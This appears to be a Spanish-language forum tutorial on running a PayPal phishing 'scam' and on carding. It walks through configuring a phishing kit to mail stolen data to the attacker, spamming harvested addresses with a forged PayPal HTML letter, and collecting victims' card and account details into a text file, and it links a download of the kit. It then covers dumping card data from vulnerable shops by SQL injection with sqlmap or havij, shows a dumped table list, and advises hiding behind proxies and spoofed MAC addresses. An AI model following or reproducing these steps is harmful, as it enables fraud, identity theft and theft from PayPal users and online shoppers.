Una vez subido como vemos en la  imagen nosotros editaremos el archivo " Email.php " y nos saldra este codigo :

<?
$send = "youemail@hotmail.com";  ///////////// CHANGE YOUR EMAIL OK.
?>

nosotros en la parte del correo electronico le pondremos  nuestro correo para que llege los datos  de las personas, pero no creen que seria algo un poco cursi ? tanto si nos rastrean los datos de envios u  otro, bueno perfecto este scam tambien tiene la opcion de guardar los datos en .TXT en la misma we de manera automatica sin modificar nada sigamos.

Ya tenemos nuestro Scam 100 % estable :



 Una vez completado ahora lo que haremos sera spamear una lista de correos electronicos que esten con cuentas de paypal / se puede obtener dumpeando un sitio web  que tenga las tablas de paypal y los corrreos electronicos o utilizadno un extractor de correos a una web de "Shop" enlazada con paypal , pero para ello nesesitamos lo siguiente :

  1-  Mailer.php para enviar el spam a los correos
  2- Letter en este caso de paypal para enviar el mensaje mediante html

 Les aconsejo que suban el Mailer.php en un servidor aparte , que no este en el mismo servidor del scam ya que el mailer  puede ser quemado facilmente.

Bueno una ves subido el mailer.php lo tendremos de la siguiente manera :



Aqui es donde entra en funcion el " Letter " , el  Letter no es mas que un archivo contenedor del codigo fuente del mensaje que paypal deja en los correos electronicos de los usuarios para  una seria de procesos en la cuenta del usuario :



 Antes de pegar el codigo del  lettler debemos modificar algunas cosas por ejemplo el link de la web
donde se direccionara el mensaje en este caso la web de nuestro "Scam "

View Source :

 <html>
    <body>
        <p>
            <a href="http://yourdomaine.com"><img alt="" src="http://s15.postimg.org/pfih678h7/222222.png" /></a></p>
    </body>
</html>

-------------------------------------------------------------------------------------------------------------------------

Source Edit :

<html>
    <body>
        <p>
            <a href="http://ejemploscam.com/hi"><img alt="" src="http://s15.postimg.org/pfih678h7/222222.png" /></a></p>
    </body>
</html>





Una ves modificado correctamente llenaremos los datos del email.php , para spamear los correos electronicos :

Requito :

   1- Tener una lista de correos electronicos
   2-Copiar el source del lettler en Message Box :


Ejemplo de datos que se debe poner :



Luego de ello le daremos en " Send eMails ", para que empieze a enviar el mensaje :





 Una vez enviado los mensajes  a la bandeja de entrada del correo, en este caso la victima creera que fue enviado por la misma web de Paypal :



La victima le dara clip en el enlace :

Click Here To Verfiy Your Account info

luego de ello la victima caera en nuestra trampa y pondra los datos  de su tarjeta de credito  y su cuenta de paypal  en esta seccion de aqui  :




Luego que la victima aya puesto todos sus datos y aceptado en las opciones de continuar, automaticamente  se guardara el  registro y se creara una carpeta en nuestro scam llamada  Rezult/CREDIT.txt mas el archivo donde se almacenaran los datos de la tarjeta de credito



Link de descarga de todo lo utilizado en este proceso :

Código: [Seleccionar]
 http://www.mediafire.com/download/d9ep6so990ywc01/Scam+Paypal+2014+%2B+Mailer+%2B+Letller.rar



 DUMPEO DE CCV

el dumpeo de las datos de una tarjeta , no es mas que una inyeccion SQL mediante una herramienta como sqlmap o havij , ya que solo extraeremos los datos que almacene la DB .

Quizas el metodo de hallar es utilizando las "dorks" de google ya que la mayoria las usa para este tipo de ataque  de algunas dork especialmente de Carding ,en este proceso  de ataque es algo comun pero este nos dara $ $ $ .

Primero nesesitamos una web vulnerable en ese caso :

    http://www.localhost.com/category.php?cat_id=1

 
 Una ves extraido la base de datos " la mayoria de tarjetas de credito se encuentren en las Tablas "Orders" o " Shopping_cart " se encuentran los datos de las CCV


Database: db309014570
[15 tables]
+-----------------------+
| categories            |
| contents              |
| login                 |
| orders                |
| orders_temp           |
| ordersp               |
| ordersp_temp          |
| products              |
| resale                |
| resale_temp           |
| shopping_cart_info    |
| shoppingcart          |
| user_credit_cart_info |
| users                 |
| users_wishlist        |
+-----------------------+


Aver entraremos en la tabla " shopping_cart_info " y veamos que nos arroja :



como vemos no ah dado informacion sobre los datos de las CCV , pero si se fijan hay mas tablas donde puede aver mas informacion para sacarle mas jugo a todo ese dinero $ $ $

entraremos a la tabla " users ", ya que estos usuarios registran su datos  para poder comprar productos de la web la cual nos hace tener acceso a este sitio 100 % cardeable tanto de extraccion como para realizar nuestras compras aqui mismo.



como vemos esta web es cardeable internamente, bueno sin mas que decir me despito ante ustedes se me olvida decirles algo , al momento de dumpear y comprar productos les aconsejo uilizar siempre un proxy Socks5 Premium , quizas uno podra decir vaya protego mi IP y listo, pero no mis queridos amigos(a) , la mac juega un rol importante en el soporto de un ordenador de la misma empresa, ya que es su numero  de " SERIE" y pocos le toman importancia  a ello les dejare una herramienta "Premium" para cambiar nuestra Mac de manera manual :



 Link de descarga :

http://www.mediafire.com/download/y5g2oiqdhsaasvk/Technitium_MAC_Address_Changer_v6.0.3_Setup.rar

Sin mas que decir me despido un saludo mis queridos fieles lectores  .


Tema Tomado de la Pagina de Mi amigo  Omar 

http://blacklast-security.com/index.php